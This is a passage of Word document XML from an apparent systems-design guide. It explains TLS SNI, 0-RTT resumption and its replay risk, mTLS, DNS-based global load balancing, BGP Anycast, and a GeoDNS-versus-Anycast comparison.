    <w:p w14:paraId="502DFC1A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SNI field</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> in ClientHello is critical for multi-tenant LBs — it tells the LB which certificate to present. The LB hosts hundreds of certificates (one per customer domain) and uses SNI to select the correct one. Before SNI (TLS 1.1 and earlier), only one certificate per IP was possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D4D16" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0-RTT resumption (TLS 1.3):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> On repeat connections, the client presents a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-Shared Key (PSK)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> derived from a previous session. The server accepts it and the client can send HTTP data in the </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>first packet</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — zero round trips before the first request. The LB must maintain session ticket state across multiple LB instances (shared ticket encryption key via distributed key management) for 0-RTT to work across LB nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F2FE16" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0-RTT replay attack vulnerability:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> 0-RTT data (requests sent before handshake completion) can be replayed by an attacker. Only </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> requests (GET, HEAD, OPTIONS) should be accepted as 0-RTT. The LB must enforce this — reject POST/PUT/DELETE requests arriving as 0-RTT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A7B92" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mTLS (Mutual TLS) — Both Sides Authenticate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3340E4" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>In standard TLS, only the server presents a certificate (the client verifies the server's identity). In mTLS, </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>both client and server present certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — the server also verifies the client's identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424D5527" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At the load balancer:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The LB verifies the client's certificate against a trusted CA (Certificate Authority). Only clients with valid certificates issued by the trusted CA are allowed through. Clients without certificates or with certificates from untrusted CAs are rejected at the LB — they never reach backend services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC88958" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Used in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4749B615" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service mesh (Istio):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> All service-to-service communication uses mTLS. Each pod's sidecar proxy has a certificate issued by Istio's CA. The sidecar verifies the calling service's certificate — ensuring only authorized services can communicate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB178C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B2B APIs:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Partners with issued certificates. No API keys that can be stolen — certificates are cryptographically bound to private keys stored securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23407B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zero-trust networking:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Every connection authenticated — no implicit trust based on network location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6D9ACE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate rotation at scale:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Certificates expire. In a microservices environment with hundreds of services, manual certificate rotation is impractical. Service meshes automate this — Istio's CA issues short-lived certificates (24-hour TTL), automatically rotating them. The sidecar proxies receive new certificates transparently without service restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D8AEDF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="4B324AE0">
          <v:rect id="_x0000_i2538" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB97947" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Global Load Balancing — Traffic Distribution Across Data Centers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486E7195" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS-Based Global Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50084455" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The outermost layer of load balancing for global systems is DNS. Different geographic regions receive different IP addresses for the same domain, routing them to different data centers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68325D99" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The authoritative DNS server (Route 53, Cloudflare, Google Cloud DNS) inspects the </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>source IP of the recursive resolver</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> making the query. It maps that resolver IP to a geographic region and returns the IP of the nearest data center.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DA5EC" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The resolver vs client problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The DNS query comes from the </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recursive resolver</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve"> (e.g., 8.8.8.8), not the client. A user in London using Google's 8.8.8.8 resolver gets routed based on where Google's resolver is located, not where the user is. EDNS Client </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>Subnet (ECS) mitigates this — the resolver includes the client's /24 subnet in the DNS query, allowing the authoritative DNS to geo-route based on client location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B134BCB" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failover via DNS:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> When a data center fails, update DNS to stop returning its IP. New connections after the TTL expires get routed to healthy data centers. </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> DNS TTL means slow failover — if TTL is 300 seconds, clients who just cached the failed DC's IP will keep trying it for up to 5 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4F645E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Health-checked DNS (Route 53 health checks):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Route 53 continuously probes your endpoints (HTTP, HTTPS, TCP). When an endpoint fails health checks, Route 53 automatically removes it from DNS responses. When it recovers, it's added back. DNS failover time = health check detection time (30–60 seconds) + DNS TTL propagation (~60–300 seconds). Total failover: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2–7 minutes</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> for DNS-based global load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA37C6" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anycast Load Balancing — How BGP Distributes Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA87A9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Anycast is the technique of </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>advertising the same IP address from multiple geographic locations</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> via BGP. Internet routing automatically directs clients to the topologically nearest location advertising that IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C34B57" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How BGP Anycast works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E26A4" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>You own IP block 203.0.113.0/24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D39D7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>You advertise this prefix from all your data centers (New York, London, Tokyo) simultaneously using BGP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F0EC42" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Each data center's upstream ISPs and internet exchanges propagate this advertisement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A4832F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The global BGP routing tables show multiple paths to 203.0.113.0/24 — each path leads to a different data center.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7949686E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>When a client in Europe resolves your IP and sends traffic to 203.0.113.1, BGP routing on the internet directs it to London (shortest AS path from Europe), not New York.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038334F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>When a client in Asia sends traffic to the same IP, BGP routes it to Tokyo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57150E2D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is powerful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCDC231" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zero DNS:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> No DNS TTL issues. Failover is driven by BGP convergence (seconds to minutes), not DNS propagation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399FB694" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Transparent to clients:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Clients use one IP. Routing is handled by the internet's BGP infrastructure — completely transparent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C315E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DDoS resilience:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> DDoS traffic attacking 203.0.113.1 is geographically distributed across all your PoPs via Anycast. A 1Tbps DDoS attack is split among 100+ PoPs, each receiving ~10Gbps — manageable at each location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6EC8AE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BGP convergence time:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> When a data center goes down, its BGP peers detect the connection loss (within seconds via BGP keepalive timers) and withdraw the route advertisement. The internet's BGP routing tables reconverge in </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>30 seconds to 3 minutes</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>, depending on AS path lengths and router processing times. During convergence, some traffic may still be routed to the failed location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E157368" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloudflare, Fastly, Google, AWS CloudFront</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> all use Anycast extensively. Cloudflare advertises the same IP (1.1.1.1) from 300+ cities simultaneously — your DNS query always reaches the nearest Cloudflare node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F93F76" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GeoDNS vs Anycast — When to Use Each</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300"/>
        <w:gridCol w:w="3479"/>
        <w:gridCol w:w="3571"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w14:paraId="5147250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04742D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1EC9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dimension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E9A1D1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1EC9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>GeoDNS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F17CA2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1EC9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Anycast</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w14:paraId="00F5329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65212A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Granularity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B62001" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>City/region level (resolver IP mapping)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F66E60" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>AS path level (BGP routing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w14:paraId="5EC0749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A1A869" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Failover speed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C6A5C7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>DNS TTL (minutes)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D29C3C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>BGP convergence (seconds to minutes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w14:paraId="4A0D429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450FE2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Client transparency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7F1AD5" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Client sees different IPs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352D08" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Client sees same IP always</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w14:paraId="53E9A8A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C0FEB6" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>DDoS handling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F8741D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Traffic concentrated at targeted DC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8B813D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Traffic naturally distributed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w14:paraId="3327C1B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F7B794" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Implementation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4A8959" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>DNS provider config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83FA58" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Requires own BGP ASN, IP blocks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w14:paraId="340A474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4012E1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Accuracy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210374" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Depends on ECS, resolver location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8E3814" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
            <w:r w:rsidRPr="002D1EC9">
              <w:t>Network topology dependent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="095D8434" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Combined approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Use Anycast for the first tier (route to nearest PoP) + L7 load balancing within each PoP for backend selection. This is how all major CDNs and cloud providers operate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A579B5" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="636F5501">
          <v:rect id="_x0000_i2539" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3B0525" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Load Balancing Algorithms for Specific Workloads</w:t>
      </w:r>
    </w:p>
